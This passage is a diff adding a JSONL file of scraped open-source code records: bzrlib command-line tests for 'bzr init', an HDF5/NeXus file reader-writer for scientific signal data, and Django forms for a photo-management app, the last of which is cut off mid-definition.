diff --git "a/3854.jsonl" "b/3854.jsonl" new file mode 100644--- /dev/null +++ "b/3854.jsonl" @@ -0,0 +1,531 @@ +{"seq_id":"909613275","text":"import os\nimport re\n\nfrom bzrlib import (\n branch as _mod_branch,\n )\nfrom bzrlib.bzrdir import BzrDirMetaFormat1\nfrom bzrlib.tests import TestSkipped\nfrom bzrlib.tests.blackbox import ExternalBase\nfrom bzrlib.tests.test_sftp_transport import TestCaseWithSFTPServer\nfrom bzrlib.workingtree import WorkingTree\n\n\nclass TestInit(ExternalBase):\n\n def test_init_with_format(self):\n # Verify bzr init --format constructs something plausible\n t = self.get_transport()\n self.run_bzr('init --format default')\n self.assertIsDirectory('.bzr', t)\n self.assertIsDirectory('.bzr/checkout', t)\n self.assertIsDirectory('.bzr/checkout/lock', t)\n\n def test_init_weave(self):\n # --format=weave should be accepted to allow interoperation with\n # old releases when desired.\n out, err = self.run_bzr('init --format=weave')\n self.assertEqual('', out)\n self.assertEqual('', err)\n\n def test_init_at_repository_root(self):\n # bzr init at the root of a repository should create a branch\n # and working tree even when creation of working trees is disabled.\n t = self.get_transport()\n t.mkdir('repo')\n format = BzrDirMetaFormat1()\n newdir = format.initialize(t.abspath('repo'))\n repo = newdir.create_repository(shared=True)\n repo.set_make_working_trees(False)\n out, err = self.run_bzr('init repo')\n self.assertEqual('', out)\n self.assertEqual('', err)\n newdir.open_branch()\n newdir.open_workingtree()\n \n def test_init_branch(self):\n out, err = self.run_bzr('init')\n self.assertEqual('', out)\n self.assertEqual('', err)\n\n # Can it handle subdirectories of branches too ?\n out, err = self.run_bzr('init subdir1')\n self.assertEqual('', out)\n self.assertEqual('', err)\n WorkingTree.open('subdir1')\n \n self.run_bzr_error(['Parent directory of subdir2/nothere does not exist'],\n 'init subdir2/nothere')\n out, err = self.run_bzr('init subdir2/nothere', retcode=3)\n self.assertEqual('', out)\n \n os.mkdir('subdir2')\n out, err = self.run_bzr('init subdir2')\n self.assertEqual('', out)\n self.assertEqual('', err)\n # init an existing branch.\n out, err = self.run_bzr('init subdir2', retcode=3)\n self.assertEqual('', out)\n self.failUnless(err.startswith('bzr: ERROR: Already a branch:'))\n\n def test_init_existing_branch(self):\n self.run_bzr('init')\n out, err = self.run_bzr('init', retcode=3)\n self.assertContainsRe(err, 'Already a branch')\n # don't suggest making a checkout, there's already a working tree\n self.assertFalse(re.search(r'checkout', err))\n\n def test_init_existing_without_workingtree(self):\n # make a repository\n repo = self.make_repository('.', shared=True)\n repo.set_make_working_trees(False)\n # make a branch; by default without a working tree\n self.run_bzr('init subdir')\n # fail\n out, err = self.run_bzr('init subdir', retcode=3)\n # suggests using checkout\n self.assertContainsRe(err,\n 'ontains a branch.*but no working tree.*checkout')\n\n def test_no_defaults(self):\n \"\"\"Init creates no default ignore rules.\"\"\"\n self.run_bzr('init')\n self.assertFalse(os.path.exists('.bzrignore'))\n\n def test_init_unicode(self):\n # Make sure getcwd can handle unicode filenames\n try:\n os.mkdir(u'mu-\\xb5')\n except UnicodeError:\n raise TestSkipped(\"Unable to create Unicode filename\")\n # try to init unicode dir\n self.run_bzr(['init', u'mu-\\xb5'])\n\n def create_simple_tree(self):\n tree = self.make_branch_and_tree('tree')\n 
self.build_tree(['tree/a'])\n tree.add(['a'], ['a-id'])\n tree.commit('one', rev_id='r1')\n return tree\n\n def test_init_create_prefix(self):\n \"\"\"'bzr init --create-prefix; will create leading directories.\"\"\"\n tree = self.create_simple_tree()\n\n self.run_bzr_error(['Parent directory of ../new/tree does not exist'],\n 'init ../new/tree', working_dir='tree')\n self.run_bzr('init ../new/tree --create-prefix', working_dir='tree')\n self.failUnlessExists('new/tree/.bzr')\n\n\nclass TestSFTPInit(TestCaseWithSFTPServer):\n\n def test_init(self):\n # init on a remote url should succeed.\n out, err = self.run_bzr(['init', self.get_url()])\n self.assertEqual('', out)\n self.assertEqual('', err)\n \n def test_init_existing_branch(self):\n # when there is already a branch present, make mention\n self.make_branch('.')\n\n # rely on SFTPServer get_url() pointing at '.'\n out, err = self.run_bzr_error(['Already a branch'],\n ['init', self.get_url()])\n\n # make sure using 'bzr checkout' is not suggested\n # for remote locations missing a working tree\n self.assertFalse(re.search(r'use bzr checkout', err))\n\n def test_init_existing_branch_with_workingtree(self):\n # don't distinguish between the branch having a working tree or not\n # when the branch itself is remote.\n self.make_branch_and_tree('.')\n\n # rely on SFTPServer get_url() pointing at '.'\n self.run_bzr_error(['Already a branch'], ['init', self.get_url()])\n\n def test_init_append_revisions_only(self):\n self.run_bzr('init --dirstate-tags normal_branch6')\n branch = _mod_branch.Branch.open('normal_branch6')\n self.assertEqual(False, branch._get_append_revisions_only())\n self.run_bzr('init --append-revisions-only --dirstate-tags branch6')\n branch = _mod_branch.Branch.open('branch6')\n self.assertEqual(True, branch._get_append_revisions_only())\n self.run_bzr_error(['cannot be set to append-revisions-only'],\n 'init --append-revisions-only --knit knit')\n","repo_name":"flyskywhy/cygwin","sub_path":"lib/python2.5/site-packages/bzrlib/tests/blackbox/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"8098625006","text":"from distutils.version import LooseVersion\nimport warnings\nimport logging\nimport datetime\nimport ast\n\nimport h5py\nimport numpy as np\nimport dask.array as da\nfrom traits.api import Undefined\nfrom hyperspy.misc.utils import ensure_unicode, multiply\nfrom hyperspy.axes import AxesManager\n\n_logger = logging.getLogger(__name__)\n\n\n# Plugin characteristics\n# ----------------------\nformat_name = 'NEXUS'\ndescription = \\\n 'Nexus file format based on the HDF5 standard'\n\nfull_support = False\n# Recognised file extension\nfile_extensions = ['nxs']\ndefault_extension = 0\n\n# Writing capabilities\nwrites = True\nversion = \"3.0\"\n\n# -----------------------\n# File format description\n# -----------------------\n# The root must contain a group called Experiments\n# The experiments group can contain any number of subgroups\n# Each subgroup is an experiment or signal\n# Each subgroup must contain at least one dataset called data\n# The data is an array of arbitrary dimension\n# In addition a number equal to the number of dimensions of the data\n# dataset + 1 of empty groups called coordinates followed by a number\n# must exists with the following attributes:\n# 'name'\n# 'offset'\n# 'scale'\n# 'units'\n# 'size'\n# 'index_in_array'\n# The experiment group contains a number of 
attributes that will be\n# directly assigned as class attributes of the Signal instance. In\n# addition the experiment groups may contain 'original_metadata' and\n# 'metadata'subgroup that will be\n# assigned to the same name attributes of the Signal instance as a\n# Dictionary Browsers\n# The Experiments group can contain attributes that may be common to all\n# the experiments and that will be accessible as attributes of the\n# Experiments instance\n#\n# CHANGES\n#\n# v3.0\n# - add Camera and Stage node\n# - move tilt_stage to Stage.tilt_alpha\n#\n# v2.2\n# - store more metadata as string: date, time, notes, authors and doi\n# - store quantity for intensity axis\n#\n# v2.1\n# - Store the navigate attribute.\n# - record_by is stored only for backward compatibility but the axes navigate\n# attribute takes precendence over record_by for files with version >= 2.1\n# v1.3\n# ----\n# - Added support for lists, tuples and binary strings\n\nnot_valid_format = 'The file is not a valid HyperSpy hdf5 file'\n\ncurrent_file_version = None # Format version of the file being read\ndefault_version = LooseVersion(version)\n\n\n\ndef file_reader(filename, backing_store=False,\n lazy=False, **kwds):\n\t\n mode = kwds.pop('mode', 'r+')\n f = h5py.File(filename, mode=mode, **kwds)\n # Getting the format version here also checks if it is a valid HSpy\n # hdf5 file, so the following two lines must not be deleted or moved\n # elsewhere.\n global current_file_version\n current_file_version = get_hspy_format_version(f)\n global default_version\n if current_file_version > default_version:\n warnings.warn(\n \"This file was written using a newer version of the \"\n \"HyperSpy hdf5 file format. I will attempt to load it, but, \"\n \"if I fail, it is likely that I will be more successful at \"\n \"this and other tasks if you upgrade me.\")\n\n models_with_signals = []\n standalone_models = []\n if 'Analysis/models' in f:\n try:\n m_gr = f.require_group('Analysis/models')\n for model_name in m_gr:\n if '_signal' in m_gr[model_name].attrs:\n key = m_gr[model_name].attrs['_signal']\n # del m_gr[model_name].attrs['_signal']\n res = hdfgroup2dict(\n m_gr[model_name],\n lazy=lazy)\n del res['_signal']\n models_with_signals.append((key, {model_name: res}))\n else:\n standalone_models.append(\n {model_name: hdfgroup2dict(\n m_gr[model_name], lazy=lazy)})\n except TypeError:\n raise IOError(not_valid_format)\n\n experiments = []\n exp_dict_list = []\n if 'Experiments' in f:\n for ds in f['Experiments']:\n if isinstance(f['Experiments'][ds], h5py.Group):\n if 'data' in f['Experiments'][ds]:\n experiments.append(ds)\n # Parse the file\n for experiment in experiments:\n exg = f['Experiments'][experiment]\n exp = hdfgroup2signaldict(exg, lazy)\n # assign correct models, if found:\n _tmp = {}\n for (key, _dict) in reversed(models_with_signals):\n if key == exg.name:\n _tmp.update(_dict)\n models_with_signals.remove((key, _dict))\n exp['models'] = _tmp\n\n exp_dict_list.append(exp)\n\n for _, m in models_with_signals:\n standalone_models.append(m)\n\n exp_dict_list.extend(standalone_models)\n if not len(exp_dict_list):\n raise IOError('This is not a valid HyperSpy HDF5 file. '\n 'You can still load the data using a hdf5 reader, '\n 'e.g. h5py, and manually create a Signal. 
'\n 'Please, refer to the User Guide for details')\n if not lazy:\n f.close()\n return exp_dict_list\n\n\ndef hdfgroup2signaldict(group, lazy=False):\n global current_file_version\n global default_version\n if current_file_version < LooseVersion(\"1.2\"):\n metadata = \"mapped_parameters\"\n original_metadata = \"original_parameters\"\n else:\n metadata = \"metadata\"\n original_metadata = \"original_metadata\"\n\n exp = {'metadata': hdfgroup2dict(\n group[metadata], lazy=lazy),\n 'original_metadata': hdfgroup2dict(\n group[original_metadata], lazy=lazy),\n 'attributes': {}\n }\n\n data = group['data']\n if lazy:\n data = da.from_array(data, chunks=data.chunks)\n exp['attributes']['_lazy'] = True\n else:\n data = np.asanyarray(data)\n exp['data'] = data\n axes = []\n for i in range(len(exp['data'].shape)):\n try:\n axes.append(dict(group['axis-%i' % i].attrs))\n axis = axes[-1]\n for key, item in axis.items():\n if isinstance(item, np.bool_):\n axis[key] = bool(item)\n else:\n axis[key] = ensure_unicode(item)\n except KeyError:\n break\n if len(axes) != len(exp['data'].shape): # broke from the previous loop\n try:\n axes = [i for k, i in sorted(iter(hdfgroup2dict(\n group['_list_' + str(len(exp['data'].shape)) + '_axes'],\n lazy=lazy).items()))]\n except KeyError:\n raise IOError(not_valid_format)\n exp['axes'] = axes\n if 'learning_results' in group.keys():\n exp['attributes']['learning_results'] = \\\n hdfgroup2dict(\n group['learning_results'],\n lazy=lazy)\n if 'peak_learning_results' in group.keys():\n exp['attributes']['peak_learning_results'] = \\\n hdfgroup2dict(\n group['peak_learning_results'],\n lazy=lazy)\n\n # If the title was not defined on writing the Experiment is\n # then called __unnamed__. The next \"if\" simply sets the title\n # back to the empty string\n if \"General\" in exp[\"metadata\"] and \"title\" in exp[\"metadata\"][\"General\"]:\n if '__unnamed__' == exp['metadata']['General']['title']:\n exp['metadata'][\"General\"]['title'] = ''\n\n if current_file_version < LooseVersion(\"1.1\"):\n # Load the decomposition results written with the old name,\n # mva_results\n if 'mva_results' in group.keys():\n exp['attributes']['learning_results'] = hdfgroup2dict(\n group['mva_results'], lazy=lazy)\n if 'peak_mva_results' in group.keys():\n exp['attributes']['peak_learning_results'] = hdfgroup2dict(\n group['peak_mva_results'], lazy=lazy)\n # Replace the old signal and name keys with their current names\n if 'signal' in exp['metadata']:\n if \"Signal\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Signal\"] = {}\n exp['metadata'][\"Signal\"]['signal_type'] = \\\n exp['metadata']['signal']\n del exp['metadata']['signal']\n\n if 'name' in exp['metadata']:\n if \"General\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"General\"] = {}\n exp['metadata']['General']['title'] = \\\n exp['metadata']['name']\n del exp['metadata']['name']\n\n if current_file_version < LooseVersion(\"1.2\"):\n if '_internal_parameters' in exp['metadata']:\n exp['metadata']['_HyperSpy'] = \\\n exp['metadata']['_internal_parameters']\n del exp['metadata']['_internal_parameters']\n if 'stacking_history' in exp['metadata']['_HyperSpy']:\n exp['metadata']['_HyperSpy'][\"Stacking_history\"] = \\\n exp['metadata']['_HyperSpy']['stacking_history']\n del exp['metadata']['_HyperSpy'][\"stacking_history\"]\n if 'folding' in exp['metadata']['_HyperSpy']:\n exp['metadata']['_HyperSpy'][\"Folding\"] = \\\n exp['metadata']['_HyperSpy']['folding']\n del exp['metadata']['_HyperSpy'][\"folding\"]\n if 
'Variance_estimation' in exp['metadata']:\n if \"Noise_properties\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Noise_properties\"] = {}\n exp['metadata']['Noise_properties'][\"Variance_linear_model\"] = \\\n exp['metadata']['Variance_estimation']\n del exp['metadata']['Variance_estimation']\n if \"TEM\" in exp[\"metadata\"]:\n if \"Acquisition_instrument\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Acquisition_instrument\"] = {}\n exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"] = \\\n exp[\"metadata\"][\"TEM\"]\n del exp[\"metadata\"][\"TEM\"]\n tem = exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"]\n if \"EELS\" in tem:\n if \"dwell_time\" in tem:\n tem[\"EELS\"][\"dwell_time\"] = tem[\"dwell_time\"]\n del tem[\"dwell_time\"]\n if \"dwell_time_units\" in tem:\n tem[\"EELS\"][\"dwell_time_units\"] = tem[\"dwell_time_units\"]\n del tem[\"dwell_time_units\"]\n if \"exposure\" in tem:\n tem[\"EELS\"][\"exposure\"] = tem[\"exposure\"]\n del tem[\"exposure\"]\n if \"exposure_units\" in tem:\n tem[\"EELS\"][\"exposure_units\"] = tem[\"exposure_units\"]\n del tem[\"exposure_units\"]\n if \"Detector\" not in tem:\n tem[\"Detector\"] = {}\n tem[\"Detector\"] = tem[\"EELS\"]\n del tem[\"EELS\"]\n if \"EDS\" in tem:\n if \"Detector\" not in tem:\n tem[\"Detector\"] = {}\n if \"EDS\" not in tem[\"Detector\"]:\n tem[\"Detector\"][\"EDS\"] = {}\n tem[\"Detector\"][\"EDS\"] = tem[\"EDS\"]\n del tem[\"EDS\"]\n del tem\n if \"SEM\" in exp[\"metadata\"]:\n if \"Acquisition_instrument\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Acquisition_instrument\"] = {}\n exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"] = \\\n exp[\"metadata\"][\"SEM\"]\n del exp[\"metadata\"][\"SEM\"]\n sem = exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"]\n if \"EDS\" in sem:\n if \"Detector\" not in sem:\n sem[\"Detector\"] = {}\n if \"EDS\" not in sem[\"Detector\"]:\n sem[\"Detector\"][\"EDS\"] = {}\n sem[\"Detector\"][\"EDS\"] = sem[\"EDS\"]\n del sem[\"EDS\"]\n del sem\n\n if \"Sample\" in exp[\"metadata\"] and \"Xray_lines\" in exp[\n \"metadata\"][\"Sample\"]:\n exp[\"metadata\"][\"Sample\"][\"xray_lines\"] = exp[\n \"metadata\"][\"Sample\"][\"Xray_lines\"]\n del exp[\"metadata\"][\"Sample\"][\"Xray_lines\"]\n\n for key in [\"title\", \"date\", \"time\", \"original_filename\"]:\n if key in exp[\"metadata\"]:\n if \"General\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"General\"] = {}\n exp[\"metadata\"][\"General\"][key] = exp[\"metadata\"][key]\n del exp[\"metadata\"][key]\n for key in [\"record_by\", \"signal_origin\", \"signal_type\"]:\n if key in exp[\"metadata\"]:\n if \"Signal\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Signal\"] = {}\n exp[\"metadata\"][\"Signal\"][key] = exp[\"metadata\"][key]\n del exp[\"metadata\"][key]\n\n if current_file_version < LooseVersion(\"3.0\"):\n if \"Acquisition_instrument\" in exp[\"metadata\"]:\n # Move tilt_stage to Stage.tilt_alpha\n # Move exposure time to Detector.Camera.exposure_time\n if \"TEM\" in exp[\"metadata\"][\"Acquisition_instrument\"]:\n tem = exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"]\n exposure = None\n if \"tilt_stage\" in tem:\n tem[\"Stage\"] = {\"tilt_alpha\": tem[\"tilt_stage\"]}\n del tem[\"tilt_stage\"]\n if \"exposure\" in tem:\n exposure = \"exposure\"\n # Digital_micrograph plugin was parsing to 'exposure_time'\n # instead of 'exposure': need this to be compatible with\n # previous behaviour\n if \"exposure_time\" in tem:\n exposure = \"exposure_time\"\n if exposure is not None:\n if \"Detector\" 
not in tem:\n tem[\"Detector\"] = {\"Camera\": {\n \"exposure\": tem[exposure]}}\n tem[\"Detector\"][\"Camera\"] = {\"exposure\": tem[exposure]}\n del tem[exposure]\n # Move tilt_stage to Stage.tilt_alpha\n if \"SEM\" in exp[\"metadata\"][\"Acquisition_instrument\"]:\n sem = exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"]\n if \"tilt_stage\" in sem:\n sem[\"Stage\"] = {\"tilt_alpha\": sem[\"tilt_stage\"]}\n del sem[\"tilt_stage\"]\n\n return exp\n\n\ndef dict2hdfgroup(dictionary, group, **kwds):\n from hyperspy.misc.utils import DictionaryTreeBrowser\n from hyperspy.signal import BaseSignal\n\n def parse_structure(key, group, value, _type, **kwds):\n try:\n # Here we check if there are any signals in the container, as\n # casting a long list of signals to a numpy array takes a very long\n # time. So we check if there are any, and save numpy the trouble\n if np.any([isinstance(t, BaseSignal) for t in value]):\n tmp = np.array([[0]])\n else:\n tmp = np.array(value)\n except ValueError:\n tmp = np.array([[0]])\n if tmp.dtype is np.dtype('O') or tmp.ndim is not 1:\n dict2hdfgroup(dict(zip(\n [str(i) for i in range(len(value))], value)),\n group.create_group(_type + str(len(value)) + '_' + key),\n **kwds)\n elif tmp.dtype.type is np.unicode_:\n if _type + key in group:\n del group[_type + key]\n group.create_dataset(_type + key,\n tmp.shape,\n dtype=h5py.special_dtype(vlen=str),\n **kwds)\n group[_type + key][:] = tmp[:]\n else:\n if _type + key in group:\n del group[_type + key]\n group.create_dataset(\n _type + key,\n data=tmp,\n **kwds)\n\n for key, value in dictionary.items():\n if isinstance(value, dict):\n dict2hdfgroup(value, group.create_group(key),\n **kwds)\n elif isinstance(value, DictionaryTreeBrowser):\n dict2hdfgroup(value.as_dictionary(),\n group.create_group(key),\n **kwds)\n elif isinstance(value, BaseSignal):\n kn = key if key.startswith('_sig_') else '_sig_' + key\n write_signal(value, group.require_group(kn))\n elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):\n overwrite_dataset(group, value, key, **kwds)\n elif value is None:\n group.attrs[key] = '_None_'\n elif isinstance(value, bytes):\n try:\n # binary string if has any null characters (otherwise not\n # supported by hdf5)\n value.index(b'\\x00')\n group.attrs['_bs_' + key] = np.void(value)\n except ValueError:\n group.attrs[key] = value.decode()\n elif isinstance(value, str):\n group.attrs[key] = value\n elif isinstance(value, AxesManager):\n dict2hdfgroup(value.as_dictionary(),\n group.create_group('_hspy_AxesManager_' + key),\n **kwds)\n elif isinstance(value, list):\n if len(value):\n parse_structure(key, group, value, '_list_', **kwds)\n else:\n group.attrs['_list_empty_' + key] = '_None_'\n elif isinstance(value, tuple):\n if len(value):\n parse_structure(key, group, value, '_tuple_', **kwds)\n else:\n group.attrs['_tuple_empty_' + key] = '_None_'\n\n elif value is Undefined:\n continue\n else:\n try:\n group.attrs[key] = value\n except:\n _logger.exception(\n \"The hdf5 writer could not write the following \"\n \"information in the file: %s : %s\", key, value)\n\n\ndef get_signal_chunks(shape, dtype, signal_axes=None):\n \"\"\"Function that claculates chunks for the signal, preferably at least one\n chunk per signal space.\n\n Parameters\n ----------\n shape : tuple\n the shape of the dataset to be sored / chunked\n dtype : {dtype, string}\n the numpy dtype of the data\n signal_axes: {None, iterable of ints}\n the axes defining \"signal space\" of the dataset. 
If None, the default\n h5py chunking is performed.\n \"\"\"\n typesize = np.dtype(dtype).itemsize\n if signal_axes is None:\n return h5py._hl.filters.guess_chunk(shape, None, typesize)\n\n # largely based on the guess_chunk in h5py\n CHUNK_MAX = 1024 * 1024\n want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize\n if want_to_keep >= CHUNK_MAX:\n chunks = [1 for _ in shape]\n for i in signal_axes:\n chunks[i] = shape[i]\n return tuple(chunks)\n\n chunks = [i for i in shape]\n idx = 0\n navigation_axes = tuple(i for i in range(len(shape)) if i not in\n signal_axes)\n nchange = len(navigation_axes)\n while True:\n chunk_bytes = multiply(chunks) * typesize\n\n if chunk_bytes < CHUNK_MAX:\n break\n\n if multiply([chunks[i] for i in navigation_axes]) == 1:\n break\n change = navigation_axes[idx % nchange]\n chunks[change] = np.ceil(chunks[change] / 2.0)\n idx += 1\n return tuple(int(x) for x in chunks)\n\n\ndef overwrite_dataset(group, data, key, signal_axes=None, **kwds):\n if signal_axes is None:\n chunks = True\n else:\n chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)\n\n maxshape = tuple(None for _ in data.shape)\n\n got_data = False\n while not got_data:\n try:\n these_kwds = kwds.copy()\n these_kwds.update(dict(shape=data.shape,\n dtype=data.dtype,\n exact=True,\n maxshape=maxshape,\n chunks=chunks,\n shuffle=True,))\n\n dset = group.require_dataset(key, **these_kwds)\n got_data = True\n except TypeError:\n # if the shape or dtype/etc do not match,\n # we delete the old one and create new in the next loop run\n del group[key]\n if dset == data:\n # just a reference to already created thing\n pass\n else:\n if isinstance(data, da.Array):\n da.store(data.rechunk(dset.chunks), dset)\n else:\n da.store(da.from_array(data, chunks=dset.chunks), dset)\n\n\ndef hdfgroup2dict(group, dictionary=None, lazy=False):\n if dictionary is None:\n dictionary = {}\n for key, value in group.attrs.items():\n if isinstance(value, bytes):\n value = value.decode()\n if isinstance(value, (np.string_, str)):\n if value == '_None_':\n value = None\n elif isinstance(value, np.bool_):\n value = bool(value)\n elif isinstance(value, np.ndarray) and value.dtype.char == \"S\":\n # Convert strings to unicode\n value = value.astype(\"U\")\n if value.dtype.str.endswith(\"U1\"):\n value = value.tolist()\n # skip signals - these are handled below.\n if key.startswith('_sig_'):\n pass\n elif key.startswith('_list_empty_'):\n dictionary[key[len('_list_empty_'):]] = []\n elif key.startswith('_tuple_empty_'):\n dictionary[key[len('_tuple_empty_'):]] = ()\n elif key.startswith('_bs_'):\n dictionary[key[len('_bs_'):]] = value.tostring()\n # The following two elif stataments enable reading date and time from\n # v < 2 of HyperSpy's metadata specifications\n elif key.startswith('_datetime_date'):\n date_iso = datetime.date(\n *ast.literal_eval(value[value.index(\"(\"):])).isoformat()\n dictionary[key.replace(\"_datetime_\", \"\")] = date_iso\n elif key.startswith('_datetime_time'):\n date_iso = datetime.time(\n *ast.literal_eval(value[value.index(\"(\"):])).isoformat()\n dictionary[key.replace(\"_datetime_\", \"\")] = date_iso\n else:\n dictionary[key] = value\n if not isinstance(group, h5py.Dataset):\n for key in group.keys():\n if key.startswith('_sig_'):\n from hyperspy.io import dict2signal\n dictionary[key[len('_sig_'):]] = (\n dict2signal(hdfgroup2signaldict(\n group[key], lazy=lazy)))\n elif isinstance(group[key], h5py.Dataset):\n dat = group[key]\n kn = key\n if key.startswith(\"_list_\"):\n ans = 
np.array(dat)\n ans = ans.tolist()\n kn = key[6:]\n elif key.startswith(\"_tuple_\"):\n ans = np.array(dat)\n ans = tuple(ans.tolist())\n kn = key[7:]\n elif dat.dtype.char == \"S\":\n ans = np.array(dat)\n try:\n ans = ans.astype(\"U\")\n except UnicodeDecodeError:\n # There are some strings that must stay in binary,\n # for example dill pickles. This will obviously also\n # let \"wrong\" binary string fail somewhere else...\n pass\n elif lazy:\n ans = da.from_array(dat, chunks=dat.chunks)\n else:\n ans = np.array(dat)\n dictionary[kn] = ans\n elif key.startswith('_hspy_AxesManager_'):\n dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))])\n elif key.startswith('_list_'):\n dictionary[key[7 + key[6:].find('_'):]] = \\\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))]\n elif key.startswith('_tuple_'):\n dictionary[key[8 + key[7:].find('_'):]] = tuple(\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))])\n else:\n dictionary[key] = {}\n hdfgroup2dict(\n group[key],\n dictionary[key],\n lazy=lazy)\n return dictionary\n\n\ndef write_signal(signal, group, **kwds):\n if default_version < LooseVersion(\"1.2\"):\n metadata = \"mapped_parameters\"\n original_metadata = \"original_parameters\"\n else:\n metadata = \"metadata\"\n original_metadata = \"original_metadata\"\n if 'compression' not in kwds:\n kwds['compression'] = 'gzip'\n\n for axis in signal.axes_manager._axes:\n axis_dict = axis.get_axis_dictionary()\n coord_group = group.create_group(\n 'axis-%s' % axis.index_in_array)\n dict2hdfgroup(axis_dict, coord_group, **kwds)\n mapped_par = group.create_group(metadata)\n metadata_dict = signal.metadata.as_dictionary()\n overwrite_dataset(group, signal.data, 'data',\n signal_axes=signal.axes_manager.signal_indices_in_array,\n **kwds)\n if default_version < LooseVersion(\"1.2\"):\n metadata_dict[\"_internal_parameters\"] = \\\n metadata_dict.pop(\"_HyperSpy\")\n dict2hdfgroup(metadata_dict, mapped_par, **kwds)\n original_par = group.create_group(original_metadata)\n dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,\n **kwds)\n learning_results = group.create_group('learning_results')\n dict2hdfgroup(signal.learning_results.__dict__,\n learning_results, **kwds)\n if hasattr(signal, 'peak_learning_results'):\n peak_learning_results = group.create_group(\n 'peak_learning_results')\n dict2hdfgroup(signal.peak_learning_results.__dict__,\n peak_learning_results, **kwds)\n\n if len(signal.models):\n model_group = group.file.require_group('Analysis/models')\n dict2hdfgroup(signal.models._models.as_dictionary(),\n model_group, **kwds)\n for model in model_group.values():\n model.attrs['_signal'] = group.name\n\n\ndef file_writer(filename,\n signal,\n *args, **kwds):\n with h5py.File(filename, mode='w') as f:\n f.attrs['file_format'] = \"HyperSpy\"\n f.attrs['file_format_version'] = version\n exps = f.create_group('Experiments')\n group_name = signal.metadata.General.title if \\\n signal.metadata.General.title else '__unnamed__'\n # / is a invalid character, see #942\n if \"/\" in group_name:\n group_name = group_name.replace(\"/\", \"-\")\n expg = exps.create_group(group_name)\n if 'compression' not in kwds:\n kwds['compression'] = 'gzip'\n # Add record_by metadata for backward compatibility\n smd = signal.metadata.Signal\n if signal.axes_manager.signal_dimension == 1:\n smd.record_by = \"spectrum\"\n elif 
signal.axes_manager.signal_dimension == 2:\n smd.record_by = \"image\"\n else:\n smd.record_by = \"\"\n try:\n write_signal(signal, expg, **kwds)\n except:\n raise\n finally:\n del smd.record_by\n","repo_name":"pquinn-dls/flupy","sub_path":"flupy/wrappers/hyperspy/io_plugins/nexus.py","file_name":"nexus.py","file_ext":"py","file_size_in_byte":27785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34957594437","text":"import os\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.bootstrap import FieldWithButtons\nfrom crispy_forms.layout import Layout, Submit, Div, Field\n\nfrom photo.models import Album\n\n\nclass ScanFolderForm(forms.Form):\n directory = forms.CharField(\n required=True,\n error_messages={'required': _('Please enter a directory')},)\n default_date = forms.DateField(\n required=True,\n error_messages={'required': _('Please enter a default date')},)\n default_tags = forms.CharField(\n required=False,\n error_messages={'required':\n _('Please enter at least one tag')},)\n\n def __init__(self, *args, **kwargs):\n super(ScanFolderForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_action = reverse('photo_scan')\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'directory',\n 'default_date',\n 'default_tags',\n Div(\n Submit('submit', _(u'Upload'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(ScanFolderForm, self).clean()\n directory = cleaned_data.get(\"directory\")\n # Check directory exists\n if not os.path.isdir(settings.PHOTO_ROOT + directory):\n raise forms.ValidationError(_(\"Directory does not exist\"))\n\n return cleaned_data\n\n\nclass EditPhotoForm(forms.Form):\n title = forms.CharField(\n required=False,)\n tags = forms.CharField(\n required=True,\n error_messages={'required':\n _('Please enter at least one tag')},)\n date = forms.DateTimeField(\n required=True,\n error_messages={'required': _('Please enter a valid date'),\n 'invalid': _('Please enter a valid date')},)\n\n def __init__(self, *args, **kwargs):\n super(EditPhotoForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'title',\n 'tags',\n Div('date', css_class='date-picker-row-fluid'),\n Div(\n Submit('submit', _(u'Update'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(EditPhotoForm, self).clean()\n return cleaned_data\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(\n required=True,\n error_messages={'required':\n _(u'Please enter something to search for')},)\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_show_labels = False\n self.helper.form_method = \"GET\"\n self.helper.form_class = 'form-horizontal'\n self.helper.field_class = 'col-lg-8'\n self.helper.layout = Layout(\n FieldWithButtons('q', Submit('submit', _(u'Go'),\n css_class='btn btn-default')),\n\n )\n\n\nclass UpdateTagsForm(forms.Form):\n UPDATE_ACTIONS = 
